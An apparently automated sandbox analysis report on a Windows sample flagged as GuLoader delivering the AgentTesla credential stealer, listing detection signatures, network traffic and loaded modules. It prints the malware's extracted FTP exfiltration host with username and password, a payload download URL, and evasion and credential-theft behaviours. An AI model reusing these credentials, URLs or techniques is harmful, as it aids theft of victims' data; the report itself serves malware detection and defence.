Edit tour

Windows Analysis Report
u9aPQQIwhj.exe

Overview

General Information

Sample name:	u9aPQQIwhj.exe renamed because original name is a hash value
Original sample name:	7bcd44c32c5d526659023b033c47e867068ae604484f85a21a4788cafe5b03e7.exe
Analysis ID:	1546022
MD5:	8b6b09811835191f99d4e2e9d94d232c
SHA1:	08edbf7da5b2e827978e178e5e49b45b5169d87c
SHA256:	7bcd44c32c5d526659023b033c47e867068ae604484f85a21a4788cafe5b03e7
Tags:	exeSpam-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

u9aPQQIwhj.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\u9aPQQIwhj.exe" MD5: 8B6B09811835191F99D4E2E9D94D232C)

u9aPQQIwhj.exe (PID: 7880 cmdline: "C:\Users\user\Desktop\u9aPQQIwhj.exe" MD5: 8B6B09811835191F99D4E2E9D94D232C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2410860650.0000000005FBA000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: u9aPQQIwhj.exe PID: 7404	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
Process Memory Space: u9aPQQIwhj.exe PID: 7880	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: u9aPQQIwhj.exe PID: 7880	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 2 entries

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T11:44:20.063181+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49730	TCP
2024-10-31T11:45:03.410315+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	62004	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T11:45:28.117345+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	62115	84.38.133.42	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: u9aPQQIwhj.exe.7880.4.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: u9aPQQIwhj.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:62131 version: TLS 1.2

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_0040276E FindFirstFileW,	4_2_0040276E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405770
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_0040622B FindFirstFileW,FindClose,	4_2_0040622B

Source: Joe Sandbox View	IP Address: 192.185.13.234 192.185.13.234
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:62115 -> 84.38.133.42:80
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:62004

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SaclKvrenGmYaqCeKqHVn198.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.42Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SaclKvrenGmYaqCeKqHVn198.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.42Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ftp.concaribe.com

Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AB7000.00000004.00000020.00020000.00000000.sdmp, u9aPQQIwhj.exe, 00000004.00000002.2919240219.0000000005A80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://84.38.133.42/SaclKvrenGmYaqCeKqHVn198.bin
Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.133.42/SaclKvrenGmYaqCeKqHVn198.binY
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://concaribe.com
Source: u9aPQQIwhj.exe, 00000004.00000002.2937245380.0000000038B21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.concaribe.com
Source: u9aPQQIwhj.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: u9aPQQIwhj.exe, 00000000.00000002.2410008030.0000000002763000.00000004.00000020.00020000.00000000.sdmp, nsw3DE5.tmp.0.dr, 660.jpg.0.dr	String found in binary or memory: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62131
Source: unknown	Network traffic detected: HTTP traffic on port 62131 -> 443

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:62131 version: TLS 1.2

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,		0_2_00403358
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,		4_2_00403358

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_00404B0E	4_2_00404B0E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_0040653D	4_2_0040653D
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_0015B21D	4_2_0015B21D
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_0015E360	4_2_0015E360
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_00154A58	4_2_00154A58
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_00153E40	4_2_00153E40
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_00154188	4_2_00154188
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_3889BB90	4_2_3889BB90
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_3889A7DC	4_2_3889A7DC
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_39043158	4_2_39043158
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_3904C240	4_2_3904C240
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_3904B2F0	4_2_3904B2F0
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_39047E40	4_2_39047E40
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_390456A0	4_2_390456A0
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_390466C0	4_2_390466C0
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_39040040	4_2_39040040
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_39042370	4_2_39042370
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_39045DB7	4_2_39045DB7
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_3904E468	4_2_3904E468
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_39047760	4_2_39047760
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_39412C51	4_2_39412C51
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Code function: 4_2_39040012	4_2_39040012

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Code function: String function: 00402B38 appears 47 times

Source: u9aPQQIwhj.exe, 00000000.00000000.1653034165.0000000000454000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamekinglet.exe> vs u9aPQQIwhj.exe
Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs u9aPQQIwhj.exe
Source: u9aPQQIwhj.exe, 00000004.00000000.2407952768.0000000000454000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamekinglet.exe> vs u9aPQQIwhj.exe
Source: u9aPQQIwhj.exe, 00000004.00000002.2936077063.0000000035D09000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs u9aPQQIwhj.exe
Source: u9aPQQIwhj.exe	Binary or memory string: OriginalFilenamekinglet.exe> vs u9aPQQIwhj.exe

Source: u9aPQQIwhj.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/9@2/3

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Code function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_0040206A

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

File created: C:\Users\user\Uploadable

Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

File created: C:\Users\user\AppData\Local\Temp\nsg3DD4.tmp

Jump to behavior

Source: u9aPQQIwhj.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

File read: C:\Users\user\Desktop\u9aPQQIwhj.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe"
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe"
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Process created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe"	Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Section loaded: mskeyprotect.dll	Jump to behavior
